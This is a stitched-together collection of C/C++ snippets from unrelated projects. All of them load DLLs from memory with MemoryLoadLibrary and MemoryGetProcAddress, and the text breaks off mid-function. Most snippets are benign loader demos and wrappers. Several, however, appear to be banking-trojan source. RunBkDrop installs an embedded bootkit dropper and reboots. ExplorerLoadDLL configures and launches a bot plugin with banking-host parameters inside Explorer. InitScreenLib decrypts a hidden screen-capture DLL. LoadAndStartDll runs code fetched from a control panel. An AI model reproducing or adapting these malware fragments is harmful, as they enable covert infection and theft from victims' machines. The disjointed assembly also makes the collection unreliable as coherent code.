// Create a server with the specified host.
IServer *ModuleManager::CreateServerInstance(onModule *Module, const char *Hostname)
{
IServer *(*CreateServer)(const char *);
// This should not happen, but checking incase it's modified in the future.
if (Module->LoadedFromDisk ? Module->ModuleHandle.Disk == NULL : Module->ModuleHandle.Memory == NULL)
{
fDebugPrint("%s: Tried to call an invalid handle.", __func__);
return nullptr;
}
// Load from memory or EAT.
if (Module->LoadedFromDisk)
{
std::string TempName = Module->Filename; TempName.append(".dll");
CreateServer = (IServer *(*)(const char *))DebugGetProcAddress(TempName.c_str(), "CreateServer");
}
else
CreateServer = (IServer *(*)(const char *))MemoryGetProcAddress(Module->ModuleHandle.Memory, "CreateServer");
// The developer of the modue forgot to export the function.
if (!CreateServer)
{
fDebugPrint("%s: Module did not export \"CreateServer\"", __func__);
return nullptr;
}
// Let this string be free, the module can clean it up.
static char *FloatingString;
FloatingString = new char[strlen(Hostname) + 1]();
memcpy(FloatingString, Hostname, strlen(Hostname));
return CreateServer(FloatingString);
};
void RunBkDrop()
{
DWORD loader_dll_body_size = 0;
void * loader_dll_body = NULL;
PP_DPRINTF(L"RunBkDrop: started.");
loader_dll_body = GetSectionData("BKDROPER_PLUG", &loader_dll_body_size);
PP_RETURNIF1(loader_dll_body == NULL);
PP_RETURNIF1(loader_dll_body_size == 0);
PP_DPRINTF(L"RunBkDrop: GetSectionData() result body=%X. size=%d", loader_dll_body,
loader_dll_body_size );
HMEMORYMODULE loader_dll = MemoryLoadLibrary(loader_dll_body);
PP_RETURNIF1(loader_dll == NULL);
typedef BOOL (WINAPI * BkInstallFunction)();
BkInstallFunction bkinstall = NULL;
bkinstall = (BkInstallFunction)MemoryGetProcAddress(loader_dll, "BkInstall");
PP_RETURNIF1(bkinstall == NULL);
BOOL bkinstall_result = bkinstall();
PP_DPRINTF(L"RunBkDrop: finished with bkinstall_result=%d.", bkinstall_result);
if (bkinstall_result) MultiMethodReboot();
}
void ExplorerLoadDLL(PUSER_INIT_NOTIFY InitData, LPBYTE Buf, DWORD Size)
{
// 320_ld попытка загрузки и запуска BotPlug
DebugReportStepByName("320_ld");
HMEMORYMODULE Module = MemoryLoadLibrary(Buf);
if (Module == NULL)
{
LDRDBG("BRDS Explorer", "Не удалось загрузить длл в память ");
return;
}
const static char SetParamMethName[] = {'S', 'e', 't', 'B', 'o', 't', 'P', 'a', 'r', 'a', 'm', 'e', 't', 'e', 'r', 0};;
SetParamMethod = (TSetParam)MemoryGetProcAddress(Module, (PCHAR)SetParamMethName);
if (SetParamMethod != NULL)
{
SetBotParameter(BOT_PARAM_BOTPLUGNAME, BotPluginName);
// Устанавливаем параметры бота
LDRDBG("BRDS Explorer", "Устанавливаем параметры бота ");
SetParam(BOT_PARAM_PREFIX);
SetParam(BOT_PARAM_HOSTS);
SetParam(BOT_PARAM_KEY);
SetParam(BOT_PARAM_DELAY);
SetParam(BOT_PARAM_BOTPLUGNAME);
SetParam(BOT_PARAM_BANKINGHOSTS);
}
typedef void (WINAPI *TStart)(LPVOID, LPVOID, LPVOID);
TStart Method = (TStart)MemoryGetProcAddress(Module, "Start");
if (Method != NULL)
{
LDRDBG("BRDS Explorer", "Бот успешно запущен ");
DLLLoader::DLLLoadedInExplorer = true;
Method(NULL, NULL, NULL);
// 321_ld попытка загрузки и запуска BotPlug успешна
DebugReportStepByName("321_ld");
}
}
/* public - replacement for GetProcAddress() */
FARPROC MyGetProcAddress(HMODULE hModule, LPCSTR lpProcName)
{
MEMORYMODULE *p = loaded;
while (p) {
if ((HMODULE)p == hModule)
return MemoryGetProcAddress(p, lpProcName);
p = p->next;
}
return GetProcAddress(hModule, lpProcName);
}
FARPROC MyGetProcAddress(HMODULE module, LPCSTR procname)
{
FARPROC proc;
LIST *lib = _FindMemoryModule(NULL, module);
if (lib)
proc = MemoryGetProcAddress(lib->module, procname);
else
proc = GetProcAddress(module, procname);
return proc;
}
void LoadFromMemory(void)
{
FILE *fp;
unsigned char *data=NULL;
size_t size;
HMEMORYMODULE handle;
addNumberProc addNumber;
HMEMORYRSRC resourceInfo;
DWORD resourceSize;
LPVOID resourceData;
TCHAR buffer[100];
fp = _tfopen(DLL_FILE, _T("rb"));
if (fp == NULL)
{
_tprintf(_T("Can't open DLL file \"%s\"."), DLL_FILE);
goto exit;
}
fseek(fp, 0, SEEK_END);
size = ftell(fp);
data = (unsigned char *)malloc(size);
fseek(fp, 0, SEEK_SET);
fread(data, 1, size, fp);
fclose(fp);
handle = MemoryLoadLibrary(data, NULL);
if (handle == NULL)
{
_tprintf(_T("Can't load library from memory.\n"));
goto exit;
}
addNumber = (addNumberProc)MemoryGetProcAddress(handle, "addNumbers");
_tprintf(_T("From memory: %d\n"), addNumber(1, 2));
resourceInfo = MemoryFindResource(handle, MAKEINTRESOURCE(VS_VERSION_INFO), RT_VERSION);
_tprintf(_T("MemoryFindResource returned 0x%p\n"), resourceInfo);
resourceSize = MemorySizeofResource(handle, resourceInfo);
resourceData = MemoryLoadResource(handle, resourceInfo);
_tprintf(_T("Memory resource data: %ld bytes at 0x%p\n"), resourceSize, resourceData);
MemoryLoadString(handle, 1, buffer, sizeof(buffer));
_tprintf(_T("String1: %s\n"), buffer);
MemoryLoadString(handle, 20, buffer, sizeof(buffer));
_tprintf(_T("String2: %s\n"), buffer);
MemoryFreeLibrary(handle);
exit:
if (data)
free(data);
}
void _Import_Zlib(char *pdata)
{
HMODULE hlib;
hlib = MemoryLoadLibrary("zlib.pyd", pdata);
if (hlib) {
void (*proc)(void);
proc = (void(*)(void))MemoryGetProcAddress(hlib, "initzlib");
if (proc)
proc();
}
}
FARPROC MyGetProcAddress(HMODULE module, LPCSTR procname)
{
FARPROC proc;
LIST *lib = _FindMemoryModule(NULL, module);
if (lib) {
dprintf("MyGetProcAddress(%p, %p(%s))\n", module, procname, HIWORD(procname) ? procname : "");
PUSH();
proc = MemoryGetProcAddress(lib->module, procname);
POP();
dprintf("MyGetProcAddress(%p, %p(%s)) -> %p\n", module, procname, HIWORD(procname) ? procname : "", proc);
return proc;
} else
return GetProcAddress(module, procname);
}
void InitScreenLib()
{
bInitialized = false;
CaptureScreen = NULL;
DWORD dwScreenSize = sizeof( Screen_Dll );
LPBYTE ScreenFile = (LPBYTE)MemAlloc( dwScreenSize + 1 );
if ( !ScreenFile )
{
return;
}
m_memcpy( ScreenFile, Screen_Dll, sizeof( Screen_Dll ) );
DWORD dwPassLen = *(DWORD*)ScreenFile;
ScreenFile += sizeof( DWORD );
dwScreenSize -= sizeof( DWORD );
char Password[30];
m_memcpy( Password, ScreenFile, dwPassLen );
Password[ dwPassLen ] = '\0';
ScreenFile += dwPassLen;
dwScreenSize -= dwPassLen;
XORCrypt::Crypt(Password, ScreenFile, dwScreenSize);
m_memset( Password, 0, dwPassLen );
hLib = MemoryLoadLibrary( ScreenFile );
if ( hLib != NULL )
{
char CapScreen[] = {'C','a','p','t','u','r','e','S','c','r','e','e','n',0};
CaptureScreen = (PCaptureScreen)MemoryGetProcAddress( hLib, CapScreen );
if ( CaptureScreen )
{
bInitialized = true;
}
}
return;
}
void LoadAndStartDll()
{
int size;
char* dll = LoadFileFromAdminka( nameLoadDll, &size );
if( dll )
{
//u_SaveToFile( "c:\\test.bin", dll, size );
HMEMORYMODULE hdll = MemoryLoadLibrary(dll);
if( hdll )
{
TypeRunFunc func = (TypeRunFunc)MemoryGetProcAddress( hdll, "TestRun" );
if( func )
func();
}
u_free(dll);
}
}
int main(int argc, char* argv[])
{
unsigned char *data;
size_t filelen;
HMEMORYMODULE testBase; // dll base handle
addNumberProc addNumber; // function ptr
if(argc < 3){
printf("Usage: %s <dll_name> <dll_func_name>\n",argv[0]);
return -1;
}
/* load the dll file into memory
*
* Note:(This step could have been from an encrypted, compressed or signed file or
* even dynamically downloaded from the web (!), etc.).
*/
data = load_file(argv[1], &filelen);
if(data == 0) { printf("failed to load %d, exiting.\n",argv[1]); return 0; }
printf("Opening lib ..\n");
/* load shared library from buffer, relocate it, etc. */
if((testBase = MemoryLoadLibrary(data)) == NULL) {
printf("Can't load library.\n");
free(data);
return -1;
}
printf("Finding api call ..\n");
/* now we can lookup any named vtable function(s) we want.. */
addNumber = (addNumberProc)MemoryGetProcAddress(testBase, argv[2]);
if(addNumber != 0) {
printf("Got it! %d = %s(1,2);\n", addNumber(1, 2),argv[2]); /* example use of dll exported function */
} else {
printf("Sorry %s() api not found in this dll.\n",argv[2]);
}
printf("Closing lib ..\n");
/* close the library */
MemoryFreeLibrary(testBase);
/* free loaded dll buffer memory */
free(data);
return 0;
}
void LoadFromMemory(void)
{
unsigned char *data=NULL;
size_t size;
HMEMORYMODULE module;
addNumberProc addNumber;
/*
FILE *fp;
fp = fopen(DLL_FILE, "rb");
if (fp == NULL)
{
printf("Can't open DLL file \"%s\".", DLL_FILE);
goto exit;
}
fseek(fp, 0, SEEK_END);
size = ftell(fp);
data = (unsigned char *)malloc(size);
fseek(fp, 0, SEEK_SET);
fread(data, 1, size, fp);
fclose(fp);
*/
HRSRC hResID = ::FindResource(NULL,MAKEINTRESOURCE(IDR_EXE1),"exe");//查找资源
HGLOBAL hRes = ::LoadResource(NULL,hResID);//加载资源
data = (unsigned char *)::LockResource(hRes);//锁定资源
module = MemoryLoadLibrary(data);
if (module == NULL)
{
printf("Can't load library from memory.\n");
goto exit;
}
addNumber = (addNumberProc)MemoryGetProcAddress(module, "addNumbers");
printf("From memory: %d\n", addNumber(1, 2));
MemoryFreeLibrary(module);
exit:
if (data)
free(data);
}
int _load_python(char *dllname, char *bytes)
{
int i;
struct IMPORT *p = imports;
HMODULE hmod;
if (!bytes)
return _load_python_FromFile(dllname);
hmod = MemoryLoadLibrary(dllname, bytes);
if (hmod == NULL) {
return 0;
}
for (i = 0; p->name; ++i, ++p) {
p->proc = (void (*)())MemoryGetProcAddress(hmod, p->name);
if (p->proc == NULL) {
OutputDebugString("undef symbol");
fprintf(stderr, "undefined symbol %s -> exit(-1)\n", p->name);
return 0;
}
}
return 1;
}
void DownloadPlugByLoaderDll()
{
DWORD loader_dll_body_size = 0;
void * loader_dll_body = NULL;
PP_DPRINTF(L"DownloadPlugByLoaderDll: started.");
// 120_d загрузка Loader_dll
PP_DBGRPT_FUNCTION_CALL(DebugReportStepByName("120_d"));
loader_dll_body = GetSectionData("LOADER_DLL", &loader_dll_body_size);
PP_RETURNIF1(loader_dll_body == NULL);
PP_RETURNIF1(loader_dll_body_size == 0);
HMEMORYMODULE loader_dll = MemoryLoadLibrary(loader_dll_body);
PP_RETURNIF1(loader_dll == NULL);
// 121_d загрузка Loader_dll успешна
PP_DBGRPT_FUNCTION_CALL(DebugReportStepByName("121_d"));
typedef BOOL (WINAPI* LoadPlugToCacheFunction)(DWORD);
LoadPlugToCacheFunction load_plug_to_cache = NULL;
load_plug_to_cache = (LoadPlugToCacheFunction)MemoryGetProcAddress(loader_dll, "LoadPlugToCache");
PP_RETURNIF1(load_plug_to_cache == NULL);
// 122_d начало вызова LoadPlugin
PP_DBGRPT_FUNCTION_CALL(DebugReportStepByName("122_d"));
BOOL load_plug_result = load_plug_to_cache(0);
PP_DPRINTF(L"DownloadPlugByLoaderDll: finished with load_plug_result=%d.", load_plug_result);
}
static BOOL
BuildImportTable(PMEMORYMODULE module)
{
unsigned char *codeBase = module->codeBase;
ULONG_PTR lpCookie = NULL;
BOOL result = TRUE;
PIMAGE_DATA_DIRECTORY directory = GET_HEADER_DICTIONARY(module, IMAGE_DIRECTORY_ENTRY_IMPORT);
if (directory->Size == 0) {
return TRUE;
}
PIMAGE_DATA_DIRECTORY resource = GET_HEADER_DICTIONARY(module, IMAGE_DIRECTORY_ENTRY_RESOURCE);
if (directory->Size == 0){
return TRUE;
}
PIMAGE_IMPORT_DESCRIPTOR importDesc = (PIMAGE_IMPORT_DESCRIPTOR) (codeBase + directory->VirtualAddress);
// Following will be used to resolve manifest in module
if (resource->Size)
{
PIMAGE_RESOURCE_DIRECTORY resDir = (PIMAGE_RESOURCE_DIRECTORY)(codeBase + resource->VirtualAddress);
PIMAGE_RESOURCE_DIRECTORY resDirTemp;
PIMAGE_RESOURCE_DIRECTORY_ENTRY resDirEntry = (PIMAGE_RESOURCE_DIRECTORY_ENTRY) ((char*)resDir + sizeof(IMAGE_RESOURCE_DIRECTORY));
PIMAGE_RESOURCE_DIRECTORY_ENTRY resDirEntryTemp;
PIMAGE_RESOURCE_DATA_ENTRY resDataEntry;
// ACTCTX Structure, not used members must be set to 0!
ACTCTXA actctx ={0,0,0,0,0,0,0,0,0};
actctx.cbSize = sizeof(actctx);
HANDLE hActCtx;
// Path to temp directory + our temporary file name
CHAR buf[MAX_PATH];
DWORD tempPathLength = GetTempPathA(MAX_PATH, buf);
memcpy(buf + tempPathLength,"AutoHotkey.MemoryModule.temp.manifest",38);
actctx.lpSource = buf;
// Enumerate Resources
int i = 0;
if (_CreateActCtxA != NULL)
for (;i < resDir->NumberOfIdEntries + resDir->NumberOfNamedEntries;i++)
{
// Resolve current entry
resDirEntry = (PIMAGE_RESOURCE_DIRECTORY_ENTRY)((char*)resDir + sizeof(IMAGE_RESOURCE_DIRECTORY) + (i*sizeof(IMAGE_RESOURCE_DIRECTORY_ENTRY)));
// If entry is directory and Id is 24 = RT_MANIFEST
if (resDirEntry->DataIsDirectory && resDirEntry->Id == 24)
{
//resDirTemp = (PIMAGE_RESOURCE_DIRECTORY)((char*)resDir + (resDirEntry->OffsetToDirectory));
resDirEntryTemp = (PIMAGE_RESOURCE_DIRECTORY_ENTRY)((char*)resDir + (resDirEntry->OffsetToDirectory) + sizeof(IMAGE_RESOURCE_DIRECTORY));
resDirTemp = (PIMAGE_RESOURCE_DIRECTORY) ((char*)resDir + (resDirEntryTemp->OffsetToDirectory));
resDirEntryTemp = (PIMAGE_RESOURCE_DIRECTORY_ENTRY)((char*)resDir + (resDirEntryTemp->OffsetToDirectory) + sizeof(IMAGE_RESOURCE_DIRECTORY));
resDataEntry = (PIMAGE_RESOURCE_DATA_ENTRY) ((char*)resDir + (resDirEntryTemp->OffsetToData));
// Write manifest to temportary file
// Using FILE_ATTRIBUTE_TEMPORARY will avoid writing it to disk
// It will be deleted after CreateActCtx has been called.
HANDLE hFile = CreateFileA(buf,GENERIC_WRITE,NULL,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_TEMPORARY,NULL);
if (hFile == INVALID_HANDLE_VALUE)
{
#if DEBUG_OUTPUT
OutputDebugStringA("CreateFile failed.\n");
#endif
break; //failed to create file, continue and try loading without CreateActCtx
}
DWORD byteswritten = 0;
WriteFile(hFile,(codeBase + resDataEntry->OffsetToData),resDataEntry->Size,&byteswritten,NULL);
CloseHandle(hFile);
if (byteswritten == 0)
{
#if DEBUG_OUTPUT
OutputDebugStringA("WriteFile failed.\n");
#endif
break; //failed to write data, continue and try loading
}
hActCtx = _CreateActCtxA(&actctx);
// Open file and automatically delete on CloseHandle (FILE_FLAG_DELETE_ON_CLOSE)
hFile = CreateFileA(buf,GENERIC_WRITE,FILE_SHARE_DELETE,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_TEMPORARY|FILE_FLAG_DELETE_ON_CLOSE,NULL);
CloseHandle(hFile);
if (hActCtx == INVALID_HANDLE_VALUE)
break; //failed to create context, continue and try loading
_ActivateActCtx(hActCtx,&lpCookie); // Don't care if this fails since we would countinue anyway
break; // Break since a dll can have only 1 manifest
}
}
}
for (; !IsBadReadPtr(importDesc, sizeof(IMAGE_IMPORT_DESCRIPTOR)) && importDesc->Name; importDesc++) {
uintptr_t *thunkRef;
FARPROC *funcRef;
HCUSTOMMODULE *tmp;
HCUSTOMMODULE handle = NULL;
char *isMsvcr = NULL;
if (g_hMSVCR != NULL && (isMsvcr = strstr((LPSTR)(codeBase + importDesc->Name), "MSVCR100.dll")))
{
handle = g_hMSVCR; //GetModuleHandle(_T("MSVCRT.dll"));
if (tmp == NULL)
tmp = (HCUSTOMMODULE *)malloc((sizeof(HCUSTOMMODULE)));
if (tmp == NULL) {
SetLastError(ERROR_OUTOFMEMORY);
result = 0;
break;
}
module->modules = tmp;
module->modules[0] = handle;
}
else
handle = module->loadLibrary((LPCSTR) (codeBase + importDesc->Name), module->userdata);
if (handle == NULL) {
SetLastError(ERROR_MOD_NOT_FOUND);
result = FALSE;
break;
}
if (!isMsvcr)
{
tmp = (HCUSTOMMODULE *)realloc(module->modules, (module->numModules + 1)*(sizeof(HCUSTOMMODULE)));
if (tmp == NULL) {
module->freeLibrary(handle, module->userdata);
SetLastError(ERROR_OUTOFMEMORY);
result = 0;
break;
}
module->modules = tmp;
if (module->numModules == 1)
module->modules[0] = NULL;
module->modules[module->numModules++] = handle;
}
if (importDesc->OriginalFirstThunk) {
thunkRef = (uintptr_t *) (codeBase + importDesc->OriginalFirstThunk);
funcRef = (FARPROC *) (codeBase + importDesc->FirstThunk);
} else {
// no hint table
thunkRef = (uintptr_t *) (codeBase + importDesc->FirstThunk);
funcRef = (FARPROC *) (codeBase + importDesc->FirstThunk);
}
for (; *thunkRef; thunkRef++, funcRef++) {
if (IMAGE_SNAP_BY_ORDINAL(*thunkRef)) {
if (!isMsvcr)
*funcRef = module->getProcAddress(handle, (LPCSTR)IMAGE_ORDINAL(*thunkRef), module->userdata);
else
*funcRef = MemoryGetProcAddress(handle, (LPCSTR)IMAGE_ORDINAL(*thunkRef));
} else {
PIMAGE_IMPORT_BY_NAME thunkData = (PIMAGE_IMPORT_BY_NAME) (codeBase + (*thunkRef));
if (!isMsvcr)
*funcRef = module->getProcAddress(handle, (LPCSTR)&thunkData->Name, module->userdata);
else
*funcRef = MemoryGetProcAddress(handle, (LPCSTR)&thunkData->Name);
}
if (*funcRef == 0) {
result = FALSE;
break;
}
}
if (!result) {
module->freeLibrary(handle, module->userdata);
SetLastError(ERROR_PROC_NOT_FOUND);
break;
}
}
if (_DeactivateActCtx && lpCookie)
_DeactivateActCtx(NULL,lpCookie);
return result;
}
void LoadOriginalLibrary()
{
if (_stricmp(DllName + 1, "vorbisFile.dll") == NULL)
{
HRSRC hResource = FindResource(dllModule, MAKEINTRESOURCE(IDR_VBHKD), RT_RCDATA);
if (hResource)
{
HGLOBAL hLoadedResource = LoadResource(dllModule, hResource);
if (hLoadedResource)
{
LPVOID pLockedResource = LockResource(hLoadedResource);
if (pLockedResource)
{
DWORD dwResourceSize = SizeofResource(dllModule, hResource);
if (0 != dwResourceSize)
{
vorbisHooked = MemoryLoadLibrary((const void*)pLockedResource, dwResourceSize);
if (vorbisHooked)
{
__ov_open_callbacks = MemoryGetProcAddress(vorbisHooked, "ov_open_callbacks");
__ov_clear = MemoryGetProcAddress(vorbisHooked, "ov_clear");
__ov_time_total = MemoryGetProcAddress(vorbisHooked, "ov_time_total");
__ov_time_tell = MemoryGetProcAddress(vorbisHooked, "ov_time_tell");
__ov_read = MemoryGetProcAddress(vorbisHooked, "ov_read");
__ov_info = MemoryGetProcAddress(vorbisHooked, "ov_info");
__ov_time_seek = MemoryGetProcAddress(vorbisHooked, "ov_time_seek");
__ov_time_seek_page = MemoryGetProcAddress(vorbisHooked, "ov_time_seek_page");
}
}
}
}
}
}
else
{
if (_stricmp(DllName + 1, "dsound.dll") == NULL) {
dsound.dll = LoadLibrary(szSystemPath);
dsound.DirectSoundCaptureCreate = GetProcAddress(dsound.dll, "DirectSoundCaptureCreate");
dsound.DirectSoundCaptureCreate8 = GetProcAddress(dsound.dll, "DirectSoundCaptureCreate8");
dsound.DirectSoundCaptureEnumerateA = GetProcAddress(dsound.dll, "DirectSoundCaptureEnumerateA");
dsound.DirectSoundCaptureEnumerateW = GetProcAddress(dsound.dll, "DirectSoundCaptureEnumerateW");
dsound.DirectSoundCreate = GetProcAddress(dsound.dll, "DirectSoundCreate");
dsound.DirectSoundCreate8 = GetProcAddress(dsound.dll, "DirectSoundCreate8");
dsound.DirectSoundEnumerateA = GetProcAddress(dsound.dll, "DirectSoundEnumerateA");
dsound.DirectSoundEnumerateW = GetProcAddress(dsound.dll, "DirectSoundEnumerateW");
dsound.DirectSoundFullDuplexCreate = GetProcAddress(dsound.dll, "DirectSoundFullDuplexCreate");
dsound.DllCanUnloadNow = GetProcAddress(dsound.dll, "DllCanUnloadNow");
dsound.DllGetClassObject = GetProcAddress(dsound.dll, "DllGetClassObject");
dsound.GetDeviceID = GetProcAddress(dsound.dll, "GetDeviceID");
}
else
{
if (_stricmp(DllName + 1, "dinput8.dll") == NULL) {
dinput8.dll = LoadLibrary(szSystemPath);
dinput8.DirectInput8Create = GetProcAddress(dinput8.dll, "DirectInput8Create");
dinput8.DllCanUnloadNow = GetProcAddress(dinput8.dll, "DllCanUnloadNow");
dinput8.DllGetClassObject = GetProcAddress(dinput8.dll, "DllGetClassObject");
dinput8.DllRegisterServer = GetProcAddress(dinput8.dll, "DllRegisterServer");
dinput8.DllUnregisterServer = GetProcAddress(dinput8.dll, "DllUnregisterServer");
}
else
{
if (_stricmp(DllName + 1, "ddraw.dll") == NULL) {
ddraw.dll = LoadLibrary(szSystemPath);
ddraw.AcquireDDThreadLock = GetProcAddress(ddraw.dll, "AcquireDDThreadLock");
ddraw.CompleteCreateSysmemSurface = GetProcAddress(ddraw.dll, "CompleteCreateSysmemSurface");
ddraw.D3DParseUnknownCommand = GetProcAddress(ddraw.dll, "D3DParseUnknownCommand");
ddraw.DDGetAttachedSurfaceLcl = GetProcAddress(ddraw.dll, "DDGetAttachedSurfaceLcl");
ddraw.DDInternalLock = GetProcAddress(ddraw.dll, "DDInternalLock");
ddraw.DDInternalUnlock = GetProcAddress(ddraw.dll, "DDInternalUnlock");
ddraw.DSoundHelp = GetProcAddress(ddraw.dll, "DSoundHelp");
ddraw.DirectDrawCreate = GetProcAddress(ddraw.dll, "DirectDrawCreate");
ddraw.DirectDrawCreateClipper = GetProcAddress(ddraw.dll, "DirectDrawCreateClipper");
ddraw.DirectDrawCreateEx = GetProcAddress(ddraw.dll, "DirectDrawCreateEx");
ddraw.DirectDrawEnumerateA = GetProcAddress(ddraw.dll, "DirectDrawEnumerateA");
ddraw.DirectDrawEnumerateExA = GetProcAddress(ddraw.dll, "DirectDrawEnumerateExA");
ddraw.DirectDrawEnumerateExW = GetProcAddress(ddraw.dll, "DirectDrawEnumerateExW");
ddraw.DirectDrawEnumerateW = GetProcAddress(ddraw.dll, "DirectDrawEnumerateW");
ddraw.DllCanUnloadNow = GetProcAddress(ddraw.dll, "DllCanUnloadNow");
ddraw.DllGetClassObject = GetProcAddress(ddraw.dll, "DllGetClassObject");
ddraw.GetDDSurfaceLocal = GetProcAddress(ddraw.dll, "GetDDSurfaceLocal");
ddraw.GetOLEThunkData = GetProcAddress(ddraw.dll, "GetOLEThunkData");
ddraw.GetSurfaceFromDC = GetProcAddress(ddraw.dll, "GetSurfaceFromDC");
ddraw.RegisterSpecialCase = GetProcAddress(ddraw.dll, "RegisterSpecialCase");
ddraw.ReleaseDDThreadLock = GetProcAddress(ddraw.dll, "ReleaseDDThreadLock");
ddraw.SetAppCompatData = GetProcAddress(ddraw.dll, "SetAppCompatData");
}
else
{
if (_stricmp(DllName + 1, "d3d8.dll") == NULL) {
d3d8.dll = LoadLibrary(szSystemPath);
d3d8.DebugSetMute = GetProcAddress(d3d8.dll, "DebugSetMute");
d3d8.Direct3D8EnableMaximizedWindowedModeShim = GetProcAddress(d3d8.dll, "Direct3D8EnableMaximizedWindowedModeShim");
d3d8.Direct3DCreate8 = GetProcAddress(d3d8.dll, "Direct3DCreate8");
d3d8.ValidatePixelShader = GetProcAddress(d3d8.dll, "ValidatePixelShader");
d3d8.ValidateVertexShader = GetProcAddress(d3d8.dll, "ValidateVertexShader");
}
else {
if (_stricmp(DllName + 1, "d3d9.dll") == NULL) {
d3d9.dll = LoadLibrary(szSystemPath);
d3d9.D3DPERF_BeginEvent = GetProcAddress(d3d9.dll, "D3DPERF_BeginEvent");
d3d9.D3DPERF_EndEvent = GetProcAddress(d3d9.dll, "D3DPERF_EndEvent");
d3d9.D3DPERF_GetStatus = GetProcAddress(d3d9.dll, "D3DPERF_GetStatus");
d3d9.D3DPERF_QueryRepeatFrame = GetProcAddress(d3d9.dll, "D3DPERF_QueryRepeatFrame");
d3d9.D3DPERF_SetMarker = GetProcAddress(d3d9.dll, "D3DPERF_SetMarker");
d3d9.D3DPERF_SetOptions = GetProcAddress(d3d9.dll, "D3DPERF_SetOptions");
d3d9.D3DPERF_SetRegion = GetProcAddress(d3d9.dll, "D3DPERF_SetRegion");
d3d9.DebugSetLevel = GetProcAddress(d3d9.dll, "DebugSetLevel");
d3d9.DebugSetMute = GetProcAddress(d3d9.dll, "DebugSetMute");
d3d9.Direct3D9EnableMaximizedWindowedModeShim = GetProcAddress(d3d9.dll, "Direct3D9EnableMaximizedWindowedModeShim");
d3d9.Direct3DCreate9 = GetProcAddress(d3d9.dll, "Direct3DCreate9");
d3d9.Direct3DCreate9Ex = GetProcAddress(d3d9.dll, "Direct3DCreate9Ex");
d3d9.Direct3DShaderValidatorCreate9 = GetProcAddress(d3d9.dll, "Direct3DShaderValidatorCreate9");
d3d9.PSGPError = GetProcAddress(d3d9.dll, "PSGPError");
d3d9.PSGPSampleTexture = GetProcAddress(d3d9.dll, "PSGPSampleTexture");
}
else
{
if (_stricmp(DllName + 1, "d3d11.dll") == NULL) {
d3d11.dll = LoadLibrary(szSystemPath);
d3d11.D3D11CoreCreateDevice = GetProcAddress(d3d11.dll, "D3D11CoreCreateDevice");
d3d11.D3D11CoreCreateLayeredDevice = GetProcAddress(d3d11.dll, "D3D11CoreCreateLayeredDevice");
d3d11.D3D11CoreGetLayeredDeviceSize = GetProcAddress(d3d11.dll, "D3D11CoreGetLayeredDeviceSize");
d3d11.D3D11CoreRegisterLayers = GetProcAddress(d3d11.dll, "D3D11CoreRegisterLayers");
d3d11.D3D11CreateDevice = GetProcAddress(d3d11.dll, "D3D11CreateDevice");
d3d11.D3D11CreateDeviceAndSwapChain = GetProcAddress(d3d11.dll, "D3D11CreateDeviceAndSwapChain");
d3d11.D3DKMTCloseAdapter = GetProcAddress(d3d11.dll, "D3DKMTCloseAdapter");
d3d11.D3DKMTCreateAllocation = GetProcAddress(d3d11.dll, "D3DKMTCreateAllocation");
d3d11.D3DKMTCreateContext = GetProcAddress(d3d11.dll, "D3DKMTCreateContext");
d3d11.D3DKMTCreateDevice = GetProcAddress(d3d11.dll, "D3DKMTCreateDevice");
d3d11.D3DKMTCreateSynchronizationObject = GetProcAddress(d3d11.dll, "D3DKMTCreateSynchronizationObject");
d3d11.D3DKMTDestroyAllocation = GetProcAddress(d3d11.dll, "D3DKMTDestroyAllocation");
d3d11.D3DKMTDestroyContext = GetProcAddress(d3d11.dll, "D3DKMTDestroyContext");
d3d11.D3DKMTDestroyDevice = GetProcAddress(d3d11.dll, "D3DKMTDestroyDevice");
d3d11.D3DKMTDestroySynchronizationObject = GetProcAddress(d3d11.dll, "D3DKMTDestroySynchronizationObject");
d3d11.D3DKMTEscape = GetProcAddress(d3d11.dll, "D3DKMTEscape");
d3d11.D3DKMTGetContextSchedulingPriority = GetProcAddress(d3d11.dll, "D3DKMTGetContextSchedulingPriority");
d3d11.D3DKMTGetDeviceState = GetProcAddress(d3d11.dll, "D3DKMTGetDeviceState");
d3d11.D3DKMTGetDisplayModeList = GetProcAddress(d3d11.dll, "D3DKMTGetDisplayModeList");
d3d11.D3DKMTGetMultisampleMethodList = GetProcAddress(d3d11.dll, "D3DKMTGetMultisampleMethodList");
d3d11.D3DKMTGetRuntimeData = GetProcAddress(d3d11.dll, "D3DKMTGetRuntimeData");
d3d11.D3DKMTGetSharedPrimaryHandle = GetProcAddress(d3d11.dll, "D3DKMTGetSharedPrimaryHandle");
d3d11.D3DKMTLock = GetProcAddress(d3d11.dll, "D3DKMTLock");
d3d11.D3DKMTOpenAdapterFromHdc = GetProcAddress(d3d11.dll, "D3DKMTOpenAdapterFromHdc");
d3d11.D3DKMTOpenResource = GetProcAddress(d3d11.dll, "D3DKMTOpenResource");
d3d11.D3DKMTPresent = GetProcAddress(d3d11.dll, "D3DKMTPresent");
d3d11.D3DKMTQueryAdapterInfo = GetProcAddress(d3d11.dll, "D3DKMTQueryAdapterInfo");
d3d11.D3DKMTQueryAllocationResidency = GetProcAddress(d3d11.dll, "D3DKMTQueryAllocationResidency");
d3d11.D3DKMTQueryResourceInfo = GetProcAddress(d3d11.dll, "D3DKMTQueryResourceInfo");
d3d11.D3DKMTRender = GetProcAddress(d3d11.dll, "D3DKMTRender");
d3d11.D3DKMTSetAllocationPriority = GetProcAddress(d3d11.dll, "D3DKMTSetAllocationPriority");
d3d11.D3DKMTSetContextSchedulingPriority = GetProcAddress(d3d11.dll, "D3DKMTSetContextSchedulingPriority");
d3d11.D3DKMTSetDisplayMode = GetProcAddress(d3d11.dll, "D3DKMTSetDisplayMode");
d3d11.D3DKMTSetDisplayPrivateDriverFormat = GetProcAddress(d3d11.dll, "D3DKMTSetDisplayPrivateDriverFormat");
d3d11.D3DKMTSetGammaRamp = GetProcAddress(d3d11.dll, "D3DKMTSetGammaRamp");
d3d11.D3DKMTSetVidPnSourceOwner = GetProcAddress(d3d11.dll, "D3DKMTSetVidPnSourceOwner");
d3d11.D3DKMTSignalSynchronizationObject = GetProcAddress(d3d11.dll, "D3DKMTSignalSynchronizationObject");
d3d11.D3DKMTUnlock = GetProcAddress(d3d11.dll, "D3DKMTUnlock");
d3d11.D3DKMTWaitForSynchronizationObject = GetProcAddress(d3d11.dll, "D3DKMTWaitForSynchronizationObject");
d3d11.D3DKMTWaitForVerticalBlankEvent = GetProcAddress(d3d11.dll, "D3DKMTWaitForVerticalBlankEvent");
d3d11.D3DPerformance_BeginEvent = GetProcAddress(d3d11.dll, "D3DPerformance_BeginEvent");
